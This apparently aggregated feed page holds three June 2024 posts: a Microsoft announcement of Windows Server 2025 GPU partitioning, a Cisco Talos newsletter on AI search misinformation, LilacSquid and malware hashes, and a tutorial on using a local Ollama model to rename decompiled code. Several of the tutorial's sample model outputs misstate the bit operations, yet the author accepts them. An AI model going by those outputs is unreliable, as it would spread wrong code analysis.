Normal view

There are new articles available, click to refresh the page.
Today — 6 June 2024Main stream

Introducing GPU Innovations with Windows Server 2025

Afia Boakye and Rebecca Wambua

 

AI empowers businesses to innovate, streamline operations, and deliver exceptional value.  With the upcoming Windows Server 2025 Datacenter and Azure Stack HCI 24H2 releases, Microsoft is empowering customers to lead their businesses through the AI revolution.

 

Here is what Hari Pulapaka, GM of Windows Server at Microsoft, says about how Windows Server empowers customers with AI: Windows Server 2025 is well positioned to help our customers be part of the AI revolution with its advanced GPU capabilities, allowing our customers to do training, learning, or inferencing using powerful NVIDIA GPUs.

 

GPUs are essential for AI due to their parallel processing capabilities and highly scalable architecture.  Using the upcoming OS releases, Microsoft’s customers can provide an entire GPU to a VM, which can run either Linux or Server, in a failover cluster using discrete device assignment (DDA). This means that mission-critical AI workloads can easily run in a clustered VM and, upon an unexpected fault or a planned move, the VM will restart on another node in the cluster, using a GPU on that node.

 

GPU Partitioning (GPU-P) is a powerful new capability we are adding with Windows Server 2025. GPU-P empowers customers to partition a supported GPU and assign those partitions to different VMs in a failover cluster.  This means that multiple VMs can share a single physical GPU, giving each VM an isolated fraction of the physical GPU's capabilities. 

 

Further, due to a planned or unplanned move, the VMs will restart on different nodes in the cluster, using GPU partitions on those different nodes.  Besides enabling clustered VMs to use GPU-P, the upcoming OS releases are bringing live migration to VMs using GPU-P.  Live migration for GPU-P enables customers to balance mission-critical workloads across their fleet and to conduct hardware maintenance and software upgrades without stopping their VMs.

 

Windows Administration Center (WAC) empowers customers to configure, use, and manage VMs using virtualized GPUs.  WAC enables administrators to manage GPU virtualization for both standalone and failover clusters from a single, centralized location, thereby reducing management complexity.

 

The screenshots below highlight GPU-P management in WAC, demonstrating how users can seamlessly view, configure, and assign GPU partitions to VMs.

 

In this first image, customers can view a comprehensive list of their partitioned GPUs.

 

afiaboakye_0-1717702566240.png

Figure 1: The GPU partitions inventory page

 

Customers can partition eligible GPUs with their desired number of partitions.

afiaboakye_1-1717702566253.png

Figure 2: The partition count configuration page

 

Finally, customers can assign GPU partitions to different VMs.

afiaboakye_2-1717702566259.png

Figure 3:  The GPU partition assignment tool

 

These high-value GPU innovations are a result of Microsoft's and NVIDIA's continual close collaboration.

 

Here is what Bob Pette, Vice President of Enterprise Platforms at NVIDIA has to say.  “GPU virtualization requires advanced security, maximum cost efficiency, and accurate horsepower.  With GPU-P now available on NVIDIA GPUs in Windows Server Datacenter, customers can meet these requirements and run their key AI workloads to achieve next-level efficiencies.”

 

Windows Server 2025 is now available for customers to try out.  Click here to download preview media and use these powerful new capabilities.

 

The sliding doors of misinformation that come with AI-generated search results

6 June 2024 at 18:00
The sliding doors of misinformation that come with AI-generated search results

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

The sliding doors of misinformation that come with AI-generated search results

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

The sliding doors of misinformation that come with AI-generated search results

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

Why do I care? 

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

6 June 2024 at 19:09

Large Language Models (LLM) such as those provided by OpenAI (GPT3/4), Google (Gemini), Anthropic (Claude) can be a useful tool to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is the data you are reviewing is processed server side, meaning any data analyzed by the tool must be uploaded/sent to the server.

While these services provide privacy policies that may double pinky swear your data is safe, and they will not use it for training if you opt-out, as a consultant we are often working with a client's data that is under NDA, preventing the usage of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this with OpenAI publicly confirming they monitor the usage of its service to identify potentially 'evil' usage by bad-actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • service may go away (outage/sale)
  • modified to prevent malicious use (RE/Exploitation often flagged)
    • potentially resulting monitoring/account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging a LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and model parameter size - this can be thought of as the amount of 'knowledge' or data stored within the model, more parameters is going to indicate more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT4, GPT3 was +100-billion parameters while GPT3.5's size has not been disclosed, speculation/research/guessing indicates it is much smaller (~22b parameters) - due to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT4 is in the +100-trillion parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range, this obviously is a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.

When it comes to actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally 24GB VRAM, meaning NVIDIA 3090 or 4090 - a used 3090 is best for the money for a turnkey solution. The next best setup is going to be an Apple Silicon (arm) Macbook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture as you are able to use system ram for compute without a performance hit. While it is possible to run these models from system ram using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow - of course there are caveats here, as with anything you will find cases where highly tuned setups can perform well, in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally, in this case I am using Ollama as it just-works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry, the required files will automatically download and enter an interactive 'chat' shell:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case you are looking to apply it to, in this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained to include code should be able to aid with this task, in this case I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size and I really wanted to target something that would be relatively performant on lower end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response is promising looking, but trying to programmatically use this response would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these are ideal as we only want the JSON structure to parse programmatically. By adjusting the prompt we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better, it follows our instructions and produced a valid json structure only; however, if we run the same input again the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path changing the instructions trying to describe what your expected output should be for the given input, but eventually the response will end up deviating in some way breaking the ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want it to generate (single/multi-shot prompting). An important thing to remember when dealing with a LLM is that it is predicting the next token/word to output based on current input, by providing an example exchange you are creating a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the instructions as we had previously as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that does a specific task that we want relatively well, and the response is parsable (JSON) for automated use.

Light Customization

In the case you have a specific use case (agent/assistant/task) you can configure a version of your underlying pre-trained weights for use through Ollama's Modelfile interface. Ollama's Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To side track for a second, each model has its own prompt format that is required to be used, as well as specific tokens used to indicate what is an instruction as well as start/stop tokens - these values can be found within the Tokenizer configuration file (tokenizer_config.json). For instance, the Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md), this can be used as seen in the following simple Python client:

import requests,json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False,"format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        t = res.json()['response']
        t = json.loads(t)
        return t
    except:
        print(f'error unpacking response')
        print(res.json()['response'])


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.

Fine-Tuning - step one: draw two circles

The initial training and creation of model weights that are released is a computationally expensive process, while follow on fine-tuning training is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior when interacting with a user.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To carry out a fine tune of a model you need complete the following steps:

  • Identify a target knowledge domain
  • Construct a dataset for your target domain
  • Train against your dataset
  • Evaluate trained model

